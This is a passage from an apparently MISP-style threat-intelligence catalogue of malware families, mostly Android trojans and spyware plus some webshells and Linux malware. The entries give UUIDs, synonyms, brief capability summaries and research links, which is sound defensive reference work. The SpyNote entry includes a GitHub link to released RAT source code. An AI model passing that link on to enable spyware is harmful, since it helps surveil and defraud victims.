SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.
Internal MISP references
UUID af929cac-e0c6-4a63-ac5a-02c4cbbab746
which can be used as unique global reference for SideWinder (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SilkBean
Internal MISP references
UUID 00ab3d3b-dbbf-40de-b3d8-a3466704a1a7
which can be used as unique global reference for SilkBean
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Skygofree
Internal MISP references
UUID f5fded3c-8f45-471a-a372-d8be101e1b22
which can be used as unique global reference for Skygofree
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Slempo
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Slempo.
Known Synonyms |
---|
SlemBunk |
Internal MISP references
UUID d87e2574-7b9c-4ea7-98eb-88f3e139f6ff
which can be used as unique global reference for Slempo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Slocker
Internal MISP references
UUID fe187c8a-25d4-4d30-bd43-efca18d527f0
which can be used as unique global reference for Slocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker - webarchive
- https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SmsAgent
Internal MISP references
UUID ee42986c-e736-4092-a2f9-2931a02c688d
which can be used as unique global reference for SmsAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SMSspy
Internal MISP references
UUID 7a38c552-0e1a-4980-8d62-1aa38617efab
which can be used as unique global reference for SMSspy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SoumniBot
Internal MISP references
UUID ed53cdaf-0649-4ca5-adcd-592a46f79da8
which can be used as unique global reference for SoumniBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
S.O.V.A.
Internal MISP references
UUID 2aa95661-b63a-432e-8e5e-74ac93b42d57
which can be used as unique global reference for S.O.V.A.
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova - webarchive
- https://muha2xmad.github.io/malware-analysis/sova/ - webarchive
- https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/ - webarchive
- https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail - webarchive
- https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections - webarchive
- https://cryptax.medium.com/eyes-on-android-s-o-v-a-botnet-sample-fb5ed332d08 - webarchive
- https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly - webarchive
- https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpyBanker
Internal MISP references
UUID e186384b-8001-4cdd-b170-1548deb8bf04
which can be used as unique global reference for SpyBanker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpyC23
Internal MISP references
UUID 8fb4910f-e645-4465-a202-a20835416c87
which can be used as unique global reference for SpyC23
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpyMax
SpyMax is a popular Android surveillance tool. Its predecessor, SpyNote, was one of the most widely used spyware frameworks.
Internal MISP references
UUID e1dfb554-4c17-4d4c-ac48-604c48d8ab0b
which can be used as unique global reference for SpyMax
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions - webarchive
- https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league - webarchive
- https://twitter.com/malwrhunterteam/status/1250412485808717826 - webarchive
- https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset - webarchive
- https://www.group-ib.com/blog/craxs-rat-malware/ - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpyNote
The malware has been released on GitHub at https://github.com/EVLF/Cypher-Rat-Source-Code
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SpyNote.
Known Synonyms |
---|
CypherRat |
Internal MISP references
UUID 31592c69-d540-4617-8253-71ae0c45526c
which can be used as unique global reference for SpyNote
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote - webarchive
- https://www.fortinet.com/blog/threat-research/android-spynote-moves-to-crypto-currencies - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr - webarchive
- https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn - webarchive
- https://hunt.io/blog/caught-in-the-act-uncovering-spynote-in-unexpected-places - webarchive
- https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA - webarchive
- https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages - webarchive
- https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/ - webarchive
- https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ - webarchive
- https://labs.k7computing.com/index.php/spynote-an-android-snooper/ - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html - webarchive
- https://cryptax.medium.com/android-spynote-bypasses-restricted-settings-breaks-many-re-tools-8791b3e6bf38 - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/ - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
- https://www.group-ib.com/blog/craxs-rat-malware/ - webarchive
- https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions - webarchive
- https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan - webarchive
- https://labs.k7computing.com/index.php/spynote-targets-irctc-users/ - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions - webarchive
- https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StealthAgent
Internal MISP references
UUID 0777cb30-534f-44bb-a7af-906a422bd624
which can be used as unique global reference for StealthAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stealth Mango
Internal MISP references
UUID 7d480f11-3de8-463d-8a19-54685c8b9e0f
which can be used as unique global reference for Stealth Mango
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Svpeng
Internal MISP references
UUID d99c0a47-9d61-4d92-86ec-86a87b060d76
which can be used as unique global reference for Svpeng
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Switcher
Internal MISP references
UUID e3e90666-bc19-4741-aca8-1e4cbc2f4c9e
which can be used as unique global reference for Switcher
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TalentRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TalentRAT.
Known Synonyms |
---|
Assassin RAT |
Internal MISP references
UUID 46151a0d-aa0a-466c-9fff-c2c3474f572e
which can be used as unique global reference for TalentRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TangleBot
Internal MISP references
UUID 1e37d712-df02-48aa-82fc-28fa80c92c2b
which can be used as unique global reference for TangleBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TeleRAT
Internal MISP references
UUID e1600d04-d2f7-4862-8bbc-0f038ea683ea
which can be used as unique global reference for TeleRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TemptingCedar Spyware
Internal MISP references
UUID 982c3554-1df2-4062-8f32-f311940ad9ff
which can be used as unique global reference for TemptingCedar Spyware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ThiefBot
Internal MISP references
UUID 5863d2eb-920d-4263-8c4b-7a16d410ff89
which can be used as unique global reference for ThiefBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TianySpy
According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.
Internal MISP references
UUID 8260dda5-f608-48f2-9341-28dbc5a8e895
which can be used as unique global reference for TianySpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyZ
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyZ.
Known Synonyms |
---|
Catelites Android Bot |
MarsElite Android Bot |
Internal MISP references
UUID 93b27a50-f9b7-4ab6-bb9f-70a4b914eec3
which can be used as unique global reference for TinyZ
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Titan
Internal MISP references
UUID 7d418da3-d9d2-4005-8cc7-7677d1b11327
which can be used as unique global reference for Titan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ToxicPanda
Internal MISP references
UUID 7ac4865d-dc9d-468e-a462-67dfc63d118b
which can be used as unique global reference for ToxicPanda
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Triada
Internal MISP references
UUID fa5fdfd2-8142-43f5-9b48-d1033b5398c8
which can be used as unique global reference for Triada
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada - webarchive
- https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/ - webarchive
- http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html - webarchive
- https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/ - webarchive
- https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/ - webarchive
- https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/ - webarchive
- https://securelist.com/triada-trojan-in-whatsapp-mod/103679/ - webarchive
- https://securelist.com/apkpure-android-app-store-infected/101845/ - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/ - webarchive
- https://security.googleblog.com/2019/06/pha-family-highlights-triada.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TrickMo
TrickMo is an advanced banking trojan for Android. Starting out as a companion malware to TrickBot in 2020, it first became a standalone banking trojan with the addition of overlay attacks in 2021 and was later (2024) upgraded with remote control capabilities for on-device fraud. The continued development and progressively improved obfuscation suggest an active threat actor.
Internal MISP references
UUID cff89ce1-a133-48a6-b8bd-e4f97cf23d6a
which can be used as unique global reference for TrickMo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.trickmo - webarchive
- https://www.cleafy.com/cleafy-labs/a-new-trickmo-saga-from-banking-trojan-to-victims-data-leak - webarchive
- https://www.zimperium.com/blog/expanding-the-investigation-deep-dive-into-latest-trickmo-samples/ - webarchive
- https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/ - webarchive
- https://cyble.com/blog/trickmos-return-banking-trojan-resurgence-with-new-features/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Triout
Bitdefender described Triout as an Android spyware which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware's surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recording videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.
Internal MISP references
UUID bd9ce51c-53f9-411b-b46a-aba036c433b1
which can be used as unique global reference for Triout
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UltimaSMS
Internal MISP references
UUID 65476d5f-321f-4385-867a-383094cadb58
which can be used as unique global reference for UltimaSMS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 001
Internal MISP references
UUID bbd5a32e-a080-4f16-98ea-ad8863507aa6
which can be used as unique global reference for Unidentified APK 001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 002
Internal MISP references
UUID afb6a7cc-4185-4f19-8ad4-45dcbb76e544
which can be used as unique global reference for Unidentified APK 002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 004
According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.
Internal MISP references
UUID 55626b63-4b9a-468e-92ae-4b09b303d0ed
which can be used as unique global reference for Unidentified APK 004
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 005
Internal MISP references
UUID 5413ca94-1385-40c0-8eb2-1fc3aff87fb1
which can be used as unique global reference for Unidentified APK 005
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 006
Information stealer posing as a fake banking app, targeting Korean users.
Internal MISP references
UUID 2263198d-af38-4e38-a7a8-4435d29d88e8
which can be used as unique global reference for Unidentified APK 006
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006 - webarchive
- https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/ - webarchive
- https://twitter.com/ReBensk/status/1438027183490940931 - webarchive
- https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749 - webarchive
- https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 007 (ARMAAN RAT)
According to Cyble, this is an Android application that pretends to be the legitimate application for the Army Mobile Aadhaar App Network (ARMAAN), intended to be used by Indian army personnel. The application was customized to include RAT functionality.
Internal MISP references
UUID 75c641c4-17df-43c4-9773-c27464c5d2ff
which can be used as unique global reference for Unidentified 007 (ARMAAN RAT)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 008
Android malware distributed through fake shopping websites, targeting Malaysian users and their banking information.
Internal MISP references
UUID 2ffddca0-841c-4eb6-9983-ff38abb5d6d6
which can be used as unique global reference for Unidentified APK 008
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified APK 009 (Chrome Recon)
According to Google, a Chrome reconnaissance payload.
Internal MISP references
UUID 6d3bcabe-6b3a-49c1-b1a9-2239ce06deae
which can be used as unique global reference for Unidentified APK 009 (Chrome Recon)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VajraSpy
Internal MISP references
UUID c328b30f-e076-47dc-8c93-4d20f62c72ab
which can be used as unique global reference for VajraSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
vamp
Related to the Micropsia Windows malware and also sometimes named Micropsia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular vamp.
Known Synonyms |
---|
android.micropsia |
Internal MISP references
UUID 1ad5b462-1b0d-4c2f-901d-ead6c9f227bc
which can be used as unique global reference for vamp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VINETHORN
According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.
Internal MISP references
UUID 6da6dfb6-2c50-465c-9394-26695d72e8c7
which can be used as unique global reference for VINETHORN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Viper RAT
Internal MISP references
UUID 3482f5fe-f129-4c77-ae98-76e25f6086b9
which can be used as unique global reference for Viper RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat - webarchive
- https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/ - webarchive
- https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf - webarchive
- https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vultur
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vultur.
Known Synonyms |
---|
Vulture |
Internal MISP references
UUID 49b1c344-ce13-48bf-9839-909ba57649c4
which can be used as unique global reference for Vultur
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.vultur - webarchive
- https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud - webarchive
- https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html - webarchive
- https://blog.fox-it.com/2024/03/28/android-malware-vultur-expands-its-wingspan - webarchive
- https://twitter.com/icebre4ker/status/1485651238175846400 - webarchive
- https://www.threatfabric.com/blogs/vultur-v-for-vnc.html - webarchive
- https://embeeresearch.io/infrastructure-tracking-locating-vultur-domains-with-passive-dns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WireX
Internal MISP references
UUID 77f2254c-9886-4eed-a7c3-bbcef4a97d46
which can be used as unique global reference for WireX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex - webarchive
- https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/ - webarchive
- https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/ - webarchive
- https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/ - webarchive
- https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WolfRAT
Internal MISP references
UUID 994c7bb3-ba40-41bb-89b3-f05996924b10
which can be used as unique global reference for WolfRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wroba
According to Avira, this is a banking trojan targeting Japan.
Internal MISP references
UUID 40a5d526-ef9f-4ddf-a326-6f33dceeeebc
which can be used as unique global reference for Wroba
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WyrmSpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WyrmSpy.
Known Synonyms |
---|
AndroidControl |
Internal MISP references
UUID 77f81373-bb3a-449d-82ff-b28fe31acef6
which can be used as unique global reference for WyrmSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.wyrmspy - webarchive
- https://cryptax.medium.com/organizing-malware-analysis-with-colander-example-on-android-wyrmspy-1f3ec30ae33b - webarchive
- https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack - webarchive
- https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xbot
Internal MISP references
UUID 4cfa42a3-71d9-43e2-bf23-daa79f326387
which can be used as unique global reference for Xbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot - webarchive
- https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/ - webarchive
- https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xenomorph
Xenomorph is an Android banking RAT developed by the Hadoken.Security actor.
Internal MISP references
UUID d202e42d-2c35-4c1c-90f1-644a8cae38f1
which can be used as unique global reference for Xenomorph
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph - webarchive
- https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html - webarchive
- https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html - webarchive
- https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html - webarchive
- https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5 - webarchive
- https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0 - webarchive
- https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xHelper
Internal MISP references
UUID f54dec1f-bec6-4f4a-a909-690d65e0f14b
which can be used as unique global reference for xHelper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XploitSPY
Internal MISP references
UUID 57600f52-b55f-49c7-9c0c-de10b2d23370
which can be used as unique global reference for XploitSPY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XRat
Internal MISP references
UUID a8f167a8-30b9-4953-8eb6-247f0d046d32
which can be used as unique global reference for XRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YellYouth
Internal MISP references
UUID a2dad59d-2355-415c-b4d6-62236d3de4c7
which can be used as unique global reference for YellYouth
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zanubis
According to Cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.
Internal MISP references
UUID cebf13e5-dbfc-49d6-8715-e3b7687d386f
which can be used as unique global reference for Zanubis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zen
Internal MISP references
UUID 46d6d102-fc38-46f7-afdc-689cafe13de5
which can be used as unique global reference for Zen
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZooPark
Internal MISP references
UUID b1fc66de-fda7-4f0c-af00-751d334444b3
which can be used as unique global reference for ZooPark
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf - webarchive
- https://securelist.com/whos-who-in-the-zoo/85394/ - webarchive
- https://securelist.com/whos-who-in-the-zoo/85394 - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-juno - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ztorg
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ztorg.
Known Synonyms |
---|
Qysly |
Internal MISP references
UUID 9fbf97c0-d87a-47b0-a511-0147a58b5202
which can be used as unique global reference for Ztorg
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg - webarchive
- http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2 - webarchive
- https://securelist.com/ztorg-from-rooting-to-sms/78775/ - webarchive
- https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nightrunner
WebShell.
Internal MISP references
UUID b0206aac-30ff-41ce-b7d4-1b94ab15e3b1
which can be used as unique global reference for Nightrunner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tunna
WebShell.
Internal MISP references
UUID b057f462-dc32-4f7b-95e0-98a20a48f2b2
which can be used as unique global reference for Tunna
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TwoFace
According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.
The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader uses to modify a decryption key embedded within the loader, which is in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload include execution of programs, upload, download and deletion of files, and the ability to manipulate MAC timestamps.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TwoFace.
Known Synonyms |
---|
HighShell |
HyperShell |
Minion |
SEASHARPEE |
Internal MISP references
UUID a98a04e5-1f86-44b8-91ff-dbe1534782ba
which can be used as unique global reference for TwoFace
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface - webarchive
- https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf - webarchive
- https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/ - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf - webarchive
- https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/ - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ - webarchive
- https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf - webarchive
- https://www.youtube.com/watch?v=GjquFKa4afU - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified ASP 001 (Webshell)
Internal MISP references
UUID d4318f40-a39a-4ce0-8d3c-246d9923d222
which can be used as unique global reference for Unidentified ASP 001 (Webshell)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Abcbot
Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute-force attempts. The botnet was observed launching DDoS attacks, performing internet scans, and serving web pages. It is probably linked to a Xanthe-based clipjacking campaign.
Internal MISP references
UUID 8d17175b-4e9f-43a9-851d-898bb6696984
which can be used as unique global reference for Abcbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot - webarchive
- https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/ - webarchive
- https://www.cadosecurity.com/the-continued-evolution-of-abcbot/ - webarchive
- https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/ - webarchive
- https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Abyss Locker
Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Abyss Locker.
Known Synonyms |
---|
elf.hellokitty |
Internal MISP references
UUID 302a96b1-73cb-4f70-a329-e68debd87bf8
which can be used as unique global reference for Abyss Locker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ACBackdoor (ELF)
A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.
Internal MISP references
UUID cd2d7040-edc4-4985-b708-b206b08cc1fe
which can be used as unique global reference for ACBackdoor (ELF)
in MISP communities and other software using the MISP galaxy
External references
